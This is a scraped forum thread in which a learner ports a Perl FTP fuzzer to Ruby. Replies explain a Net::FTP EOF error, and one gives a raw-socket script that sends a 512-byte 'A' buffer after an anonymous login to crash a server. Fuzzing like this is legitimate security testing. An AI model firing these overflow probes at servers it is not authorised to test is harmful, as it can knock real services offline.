Using Ruby to fuzz FTP Server
Hey, I'm new to Ruby and trying to learn by porting some progs from one language to another. Right now I'm working on an FTP fuzzer in Ruby that mirrors this perl script:
use Net::FTP;
$target = "192.168.37.128";
$buffer = "A\x20";
$buffer .= "A" x 512;
$ftp = Net::FTP->new($target, Debug => 0, Timeout => 5)
or die "Cannot connect to $host: $@ \n";
$ftp->login("anonymous",'anonymous@nowhere.com')
or die "Couldn't log in: $@\n";
$ftp->list($buffer);
$ftp->quit;
This is my Ruby equivalent:
require 'net/ftp'
buffer = 'A\x20'
buffer = (buffer + ('A'*512))
ftp = Net::FTP.open('127.0.0.1','anonymous','anonymous')
ftp.login
ftp.list(buffer)
ftp.quit
When I run the program I get the following error:
C:/Ruby192/lib/ruby/1.9.1/net/ftp.rb:241:in `readline': end of file reached (EOF
Error)
from C:/Ruby192/lib/ruby/1.9.1/net/ftp.rb:241:in `getline'
from C:/Ruby192/lib/ruby/1.9.1/net/ftp.rb:251:in `getmultiline'
from C:/Ruby192/lib/ruby/1.9.1/net/ftp.rb:265:in `getresp'
from C:/Ruby192/lib/ruby/1.9.1/net/ftp.rb:281:in `voidresp'
from C:/Ruby192/lib/ruby/1.9.1/net/ftp.rb:304:in `block in voidcmd'
from C:/Ruby192/lib/ruby/1.9.1/monitor.rb:201:in `mon_synchronize'
from C:/Ruby192/lib/ruby/1.9.1/net/ftp.rb:302:in `voidcmd'
from C:/Ruby192/lib/ruby/1.9.1/net/ftp.rb:155:in `send_type_command'
from C:/Ruby192/lib/ruby/1.9.1/net/ftp.rb:149:in `binary='
from C:/Ruby192/lib/ruby/1.9.1/net/ftp.rb:168:in `ensure in with_binary'
from C:/Ruby192/lib/ruby/1.9.1/net/ftp.rb:168:in `with_binary'
from C:/Ruby192/l开发者_Go百科ib/ruby/1.9.1/net/ftp.rb:440:in `block in retrlines'
from C:/Ruby192/lib/ruby/1.9.1/monitor.rb:201:in `mon_synchronize'
from C:/Ruby192/lib/ruby/1.9.1/net/ftp.rb:439:in `retrlines'
from C:/Ruby192/lib/ruby/1.9.1/net/ftp.rb:682:in `list'
from ftpcrash.rb:10:in `<main>'
I've traced the issue to the ftp.list(buffer)
line, but can't come up with a Ruby solution that will accomplish what $ftp->list($buffer)
does in the perl one.
Suggestions?
The buffer is unnecessary. #list takes an optional argument like '*n', not a buffer, and it returns an array.
require 'net/ftp'
ftp = Net::FTP.open('ftp.gnu.org','anonymous','')
puts ftp.list
ftp.quit
Judging by net/ftp.rb
source code this exception is raised when ftp library is trying to get a response from the server and response is empty.
You should wrap this command in begin/rescue/end
(or just rescue
) and handle the error accordingly.
Here What you want dude
#!/bin/ruby
require 'socket'
buffer = "A" * 512
host = 'xx.xx.xx.xx'
port = 21
s = TCPSocket.open(host, port)
s.recv(1024)
s.send("USER anonymous\r\n", 0)
s.recv(1024)
s.send("PASS anonymous\r\n", 0)
s.recv(1024)
s.send(buffer + "\r\n", 0)
sleep 0.3
s.close
Stay Secure ;)
精彩评论